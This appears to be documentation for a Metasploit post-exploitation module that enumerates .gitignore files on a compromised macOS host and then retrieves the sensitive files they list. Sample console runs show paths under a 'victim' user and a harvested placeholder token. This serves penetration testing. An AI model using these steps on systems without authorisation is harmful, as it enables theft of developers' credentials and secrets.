documentation/modules/post/osx/gather/gitignore.md
This module finds and retrieves gitignore files from the user's home directory, as well as retrieves the contents of files found in the gitignore.
Locate gitignore files:
3. Do: use post/osx/gather/gitignore
4. Do: set session #
5. Do: set mode 1
5. Do: run
6. You should see a list of all gitignore files with absolute path located recursively from the users'r home directory
Retrieve gitignore files:
7. Do: set mode 2
8. Do: set file /absolute/path/to/.gitignore
9. Do run
10. You should see the contents of the gitignore file. If you see anything useful, you can also retrieve these artifacts.
Retrieve sensitive or interesting artifacts:
11. Do: set file /absolute/path/to/sensitive_file
12. Do: run
Select between enumeration and retrieval mode. Mode 1 is enumeration of all gitignore files recursively in the user's home directory. Mode 2 is used for retrieving file contents should they be ASCII text.
This is the absolute file path to the .gitignore and/or sensitive file you would like to retrieve.
Gitignore files commonly list items developers don't want leaked and generally contain sensitive information.
msf post(osx/gather/gitignore) > set mode 1
msf post(osx/gather/gitignore) > set session 1
msf post(osx/gather/gitignore) > run
[*] Fetching .gitignore files
[+] /Users/victim/Documents/project/.gitignore
[+] ...
[*] Post module execution completed
msf post(osx/gather/gitignore) > set file /Users/victim/project/.gitignore
msf post(osx/gather/gitignore) > set mode 2
msf post(osx/gather/gitignore) > run
[+] /Users/victim/project/.gitignore
[+] .sensitive_file
[*] Post module execution completed
msf post(osx/gather/gitignore) > set file /Users/victim/project/.sensitive_file
msf post(osx/gather/gitignore) > run
[+] /Users/victim/project/.sensitive_file
[+] PWNED_APPLICATION_TOKEN=cHduZWQgdXIgZ2l0aHVi
[*] Post module execution completed